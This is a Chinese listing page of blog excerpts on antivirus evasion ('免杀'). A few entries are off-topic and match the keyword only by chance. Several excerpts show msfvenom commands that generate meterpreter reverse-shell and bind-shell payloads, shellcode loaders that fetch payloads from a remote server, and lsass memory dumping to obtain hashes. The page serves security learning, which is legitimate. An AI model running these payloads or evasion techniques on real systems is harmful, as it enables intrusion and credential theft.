veil免杀

刚工作,不知道怎么变得专业

今天特么可贼热,我QQ上又来了一个想搞暧昧的寂寞人,我拒绝了一次,哎,又给我来了第二次,可是特么这样都能撩动我,可见人性是多么软弱,理智是多么脆弱,我活了20年,就是跟人性斗争的血泪史,他让我避免杀身之祸
三个么么哒·2022-02-09 14:39

webshell之jsp免杀

webshell之jsp免杀转载自webshell免杀研究原理向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作。
tomyyyyy·2022-02-05 21:06

weevely的使用及免杀(Linux中的菜刀)

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记前文链接WAMP/DVWA/sqli-labs搭建burpsuite工具抓包及Intruder暴力破解的使用目录扫描,请求重发,漏洞扫描等工具的使用网站信息收集及nmap的下载使用SQL注入(1)——了解成因和手工注入方法SQL注入(2)——各种注入SQL注入(3)——SQLMAPSQL注入(4)——实战SQL注入拿webshellVulnhu
漫路在线·2022-02-04 16:05

免杀技术】Tomcat内存马-Filter

Tomcat内存马-Filter型什么是内存马?为什么要有内存马?什么又是Filter型内存马?这些问题在此就不做赘述Filter加载流程分析tomcat启动后正常情况下对于Filter的处理过程:加载web.xml配置文件读取filter的信息,并将其保存在context对象里的filterDef,filterConfigs,filterMappers中filterChain的构造流程:1.匹配
Aurora-M·2022-02-04 15:00

VC++源码免杀教程 286合购网ghost免杀教程

网络攻防技术中的免杀技术是十分有趣的,尤其要说ghostvc++源码免杀,过掉国内的杀毒软件,达到不损坏功能,正常上线,从而无视杀软的存在.免杀之网络攻防入门书籍推荐1.杀不死的秘密-反汇编揭露黑客免杀变种技术
玩弄你们·2022-02-03 06:16

内网渗透-免杀抓取windows hash

前言内网渗透时,获得主机管理员权限后,通常会抓取用户的明文密码或hash,进行pth攻击。大部分情况会遇到防护软件,常规抓取方法失效,因此需要对防护进行绕过。Procdump.exeProcdump是微软官方发布的工具,使用该工具可以把lsass的内存dump下来,可以绕过大多数的防护软件。首先使用procdump.exe把进程lsass.exe的内存dump下来procdump.exe-acce
Tide_诺言·2022-02-02 22:05

Python免杀木马轻松过Defender,秒杀36*和火*

测试环境联网的Win10,开启了Defender最新的火绒和360杀毒Defender肯定要取消上传可疑文件的!测试步骤这里使用CS生成python类型的木马文件,并对生成的shellcode进行Base64编码和HEX编码,将编码后的shellcode分成几个文件存放,再去请求下载并解码,最后将解码后的shellcode加载到内存中。编译成EXE,顺便使用upx压缩下:开启Defender的Wi
LMcream·2022-01-27 09:21

红队远控免杀初探

免杀初探自己一直是研究wb安全方向比较多,对红队远控免杀的认知基本没有,一直是听着大哥们说,却一直没有静下心来系统性的学习过,这里记录下免杀的学习记录。
CKCsec·2021-12-02 14:46

Assassin暗杀者-自用短小精悍的webshell管理工具分享

自用工具开源互相学习,工具短小精悍,生成的webshell能够过目前主流杀毒软件(36x、腾x等,目前能过,后面可能很快就不行了,需要稍微变换webshell代码以再次免杀)连接后交互的流量特征几乎没有
b1ackc4t·2021-11-23 21:00

windows命令混淆

最近有些朋友问我一些免杀问题,由于个人技术有限,对静态免杀有些了解(动态免杀真的不会,太菜了),所以就总结了一些Windows中cmd的命令混淆思路,静态免杀无非就是对安全设备检测到代码(命令)中的特征字符进行查杀
·2021-11-10 17:19

【Web安全】JSP内存马研究

前言最近在研究webshell免杀的问题,到了内存马免杀部分发现传统的Filter或者Servlet查杀手段比较多,不太容易实现免杀,比如有些工具会将所有注册的Servlet和Filter拿出来,排查人员仔细一点还是会被查出来的
IT老涵·2021-10-19 16:08

Metasploit 实现木马生成、捆绑及免杀

木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。
·2021-10-08 14:06

渗透测试-木马免杀的几种方式

前言免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。
白面安全猿·2021-09-28 21:25

《水浒传》专题探究之英雄辨析(二)

结识英雄过渡语:有人说,这些梁山好汉中,有些人不是“真英雄”,如宋江怕李逵造反,在临死前为了保住自己的虚名,竟然毒死自己肝胆相照的好兄弟,不是英雄所为;武松在血洗鸳鸯楼时,杀死张都监家眷和仆人十几人,不免杀心过重
一一真·2021-09-23 03:38

红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?

文章来源|MS08067红队培训班第12节课作业本文作者:某学员A(红队培训班1期学员)按老师要求尝试完成布置的作业如下:一、远程线程注入(一)通过MSF生成payload通过msfvenom生成payload,命令如下:msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.61.103lport=4444-ex86/shikata_ga_n
Ms08067安全实验室·2021-09-01 07:00

红队培训班作业 | 免杀过360和火绒 四种方法大对比

MS08067红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kalilinux安装cs4.2,Windows7系统安装火绒杀毒和360杀毒,为测试免杀并且防止联网查杀
Ms08067安全实验室·2021-08-16 07:00

后渗透免杀返回shell教程

一天一个入狱小技巧,教程地址:https://www.bilibili.com/video/BV1xa4y1p7Kr
表弟_十七·2021-06-08 20:34

无力吐槽的命运

话说过年家家户户不免杀鸡杀鸭的,一邻居抱怨说:哎呀,今早就要杀了,结果忘记了,还喂了一肚子饱饱的。我九十岁的爷爷接话了:过去犯人要砍头的时候还得给一顿饱,你就多喂一把谷子又算得了什么。
不思九八·2021-06-05 13:13

powershell加密、压缩 免杀实战

结合"PowerShellcrypter"工具(下面用简称"crypter")来对powershell脚本进行加密并采用Gzip/DEFLATE来绕过杀软1、msfvenom生成powershell反弹马msfvenom-pwindows/x64/meterpreter_reverse_tcpLHOST=192.168.81.253LPORT=5555-fpsh-reflection>hacksh
城市烈人·2021-06-04 14:22

探索跟盈利矛盾

新证明新数据,容错,不很确定的,隐藏免杀的走两步,共存,但总的仍掌控。大数据动轨迹。仍在我的掌控下,动,所以为监控。有限的资源开发监控非常不
gbaidu2009_·2021-05-28 07:46

python免杀技术---复现+改进----1

0x01复现复现文章:https://mp.weixin.qq.com/s?__biz=MzI3MzUwMTQwNg==&mid=2247484733&idx=2&sn=5b8f439c2998ce089eb44541d2da7a15&chksm=eb231%E2%80%A6首先用cobaltstruke生成一个python的payload脚本然后复制里面的payload进行Base64编码:加密
go0dStudy·2021-05-22 20:44

python免杀技术---shellcode的加载与执行

0x01生成shellcode首先通过下列命令生成一个shellcode,使用msfvenom-p选项来指定paylaod,这里选用windows/x64、exec模块接收的参数。使用calc.exe执行弹出计算器的操作。-f选项用来执行生成的shellcdoe的编译语言。msfvenom-pwindows/x64/execCMD='calc.exe'-fpy0x02加载与执行shellcode的
go0dStudy·2021-05-22 15:07

使用Metasploit对Windows系统渗透测试——加壳免杀花指令

文章目录前言一、准备工作1.生成被控端攻击载荷2.生成主控端handler二、获取winxp的shell三、获取win7的shell四、获取win10的shell1.免杀+捆绑2.加壳+压缩3.花指令4
我重来不说话·2021-05-21 21:51

WAF绕过--小马绕过

WAF绕过之小马免杀WAF:安全狗-Apache版v4正常的PHP一句话木马:对于这个正常的一句话木马,安全狗会拦截。关于拦截其实最主要的还是测试,看看Waf究竟怎么拦截。
wwxxee·2021-05-17 22:22

我想我们在这里会好好的

因为去超市买东西,玛蒂达才得以避免杀生之祸,她径直走向里昂的房间,急促的敲门。并用颤抖恳求的声音说道,请开门!里昂虽有所犹豫终究还是打开了那扇关乎玛蒂达生死
夏天丫头·2021-05-08 13:15

shellcode免杀思路

shellcode免杀思路使用msfconsole生产的shellcode之后正常写入到程序的内存里面的话会直接被杀毒软件静态查杀就能杀掉。
不吃茄子的汪·2021-05-04 23:33

使用msf渗透安卓系统

meterpreter/reverse_tcpLHOST=192.168.1.7LPORT=5555R>/root/apk.apkLHOST本地的IP地址LPORT反向连接到主机的端口R>木马生成的保存输出路径至于木马的免杀暂且不谈
__周__·2021-05-04 14:10

《the painted veil(面纱)》札记——沃尔特之殇

《thepaintedveil》你为什么要瞧不起自己?因为我爱你。爱而不得,却又离不开放不下。其实没有卑微的爱,我们错觉卑微,是因为在我们看来,某一份爱里,那付出是不值得。背叛终要救赎,在一起也永远不会幸福,所以懦弱的、勇敢的、睿智的、无私的、奉献的沃尔特决绝一死。可他终于还是没有解脱。只有一种办法赢得人心,那就是让自己成为人们会去爱的人。我屈服于你是因为我想要你,但那不是真正的我。我不是那个可恶
一只野生老师·2021-04-29 18:15

使用msf渗透安卓系统

meterpreter/reverse_tcpLHOST=192.168.1.7LPORT=5555R>/root/apk.apkLHOST本地的IP地址LPORT反向连接到主机的端口R>木马生成的保存输出路径至于木马的免杀暂且不谈
二潘·2021-04-20 15:06

python 免杀验证

使用Metasploit生成C语言风格的一些shellcode作为载荷,这里使用Windowsbindshell,功能为选定一个TCP端口与cmd.exe进程绑定在一起,方便攻击者远程连接进行操控。输入命令:msfvenom-pwindows/shell_bind_tcpLPORT=1337-fc-opayload.c接着在Python中调用ctypes库,定义一个存在该shellcode的变量,
SkTj·2021-04-19 05:15

windows免杀工具三部曲(二)

前言在渗透测试中经常遇到有杀毒的软件,不会代码层的我只能寻找几款不错的免杀工具。进行傻瓜式配置。
CSeroad·2021-04-18 17:49

windows免杀工具三部曲(一)

前言在渗透测试中经常遇到有杀毒的软件,不会代码层的我只能寻找几款不错的免杀工具。进行傻瓜式配置。
CSeroad·2021-04-18 09:46

利用python免杀cs shellcode

0x01前言2019年,告别了coder的世界,告别了从前的生活。我决定暂时抛开金钱至上的价值体系,以一个Fuckingloser的身份去寻找人生中的三大哲学问题,我是谁,我在哪儿,我在做什么。褪去了互联网行业的尔虞我诈,轻浮缥缈。在这个铺天盖地的泛娱乐时代,我决定去看看大海,去感受下海水的味道,没错,它确实是咸的。当沙滩上的沙子铺满全身的那一刻,我,拥有了几分钟童年。在途中,偶遇了黄河,没错,它
蚁景科技·2021-04-14 21:19

免杀工具FourEye(重明)

首先感谢作者lengyi,感觉玩Web的除了一部分因为工作原因不需要接触免杀,其他的一些做渗透的都需要接触免杀,但是里面也有很多代码能力不足的同学,个人感觉挺需要这种一键免杀的工具。
LMcream·2021-04-12 23:42

博客

主要方向:java代码审计内网渗透免杀渗透测试
唐小风7·2021-04-12 15:25

metasploit简单实战 获得win7shell

两台虚拟机kali:192.168.56.158win7:192.168.56.1451.使用metasploit的msfvenom生成木马然后你可以通过各种方式把木马搞到别人电脑上最好做一下免杀处理,
luckyQAQ·2021-03-11 05:31

windows免杀工具-加载shellcode

前言HW在即,免杀是通往内网的重要桥梁。手里多备点免杀工具总是没错的。
CSeroad·2021-02-09 15:03

windows命令行反弹shell(一)

powershell反弹cmdpowercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。
CSeroad·2021-02-05 10:33

(记录向)Python反序列化免杀上线CS(并使用Shielden加密绕过360)

1、首先cs生成一个64位的PythonPayload2、截取其中的Payload,并进行base64编码。3、把这一串子base64放到VPS上。并开启web服务。python3-mhttp.server77774、使用以下脚本。将PythonPayload进行反序列化。importpickleimportbase64shellcode="""importctypes,urllib.reques
daxi0ng·2021-01-31 11:41

Metasploit实现木马生成、捆绑及免杀

木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。
·2021-01-26 02:51

杀毒与免杀技术详解---白嫖党福音

简介不管是社工钓鱼,还是一句话木马getshell,远控,亦或者是反弹shell,都会遇到杀软waf这些大敌,当然主要还是杀软,因此我们不得不考虑免杀进而实现我们渗透测试目的。
程序猿小白^·2021-01-15 13:43

一句话木马以及免杀

此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础查杀软件我首先:D盾『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护
fuqin.ltd·2021-01-08 17:02

pyinstaller+cs生成免杀exe过杀毒软件

pyinstaller+cs生成免杀exe过杀毒软件简介:之前学习免杀都是使用Metasploit自带的编码进行,从未成功过。
Dmct·2021-01-01 21:44

.htaccess 文件不工作_手撕CTFHub-Web(六):文件上传

用的Webshell是在真实的网站中获取的,我把这些Webshell保存了下来,都是免杀的无验证1.因为没有验证,直接上传了一个webshell,还告诉我传到了哪儿。
撒哈巴拉卡达西亚·2020-12-30 03:28

CS木马免杀(绕过360杀毒与腾讯安全管家)

CS木马免杀(绕过360杀毒与腾讯安全管家)步骤1搭建服务器.
为你而来xss·2020-12-29 17:55

免杀】加载LSB隐写shellcode

参考资料:B站yuppt【学习分享】分离免杀shellcode#include《stdlib.h》作用#include〈stdio.h〉有什么作用C/C++文件读写操作——FILE*、fstream、windowsAPIfseek
Sp0n·2020-12-19 23:15

python 生成payload_利用python免杀cs shellcode

原创AgeloVito合天智汇0x01前言2019年,告别了coder的世界,告别了从前的生活。我决定暂时抛开金钱至上的价值体系,以一个Fuckingloser的身份去寻找人生中的三大哲学问题,我是谁,我在哪儿,我在做什么。褪去了互联网行业的尔虞我诈,轻浮缥缈。在这个铺天盖地的泛娱乐时代,我决定去看看大海,去感受下海水的味道,没错,它确实是咸的。当沙滩上的沙子铺满全身的那一刻,我,拥有了几分钟童年
weixin_39834488·2020-12-05 19:52

python pointer_免杀 | 利用Python免杀CS Shellcode

0x01前言2019年,告别了coder的世界,告别了从前的生活。我决定暂时抛开金钱至上的价值体系,以一个Fuckingloser的身份去寻找人生中的三大哲学问题,我是谁,我在哪儿,我在做什么。褪去了互联网行业的尔虞我诈,轻浮缥缈。在这个铺天盖地的泛娱乐时代,我决定去看看大海,去感受下海水的味道,没错,它确实是咸的。当沙滩上的沙子铺满全身的那一刻,我,拥有了几分钟童年。在途中,偶遇了黄河,没错,它
weixin_39842617·2020-11-27 08:31

php5.5 反序列化利用工具_利用Python反序列化运行加载器实现免杀

前言前几天在看Python的shellcode加载器,在网上找了一个,结果加载器自身就过不了火绒,测试发现是火绒对关键语句进行了识别。所以我们要想办法去掉加载器中明显的特征。原理及实现在绕过静态查杀方面,主要就是要隐藏特征,比较常见的就是各种混淆、加密,但加密后的代码到最终还是需要去执行它才行,代码执行这一个操作其实特征也是很明显的,像exec、eval、os.system、subprocess.
weixin_39558521·2020-11-25 18:04

PHP后门隐藏的一些技巧总结

前言如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。
·2020-11-19 09:13
上一页 5 6 7 8 9 10 11 12 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他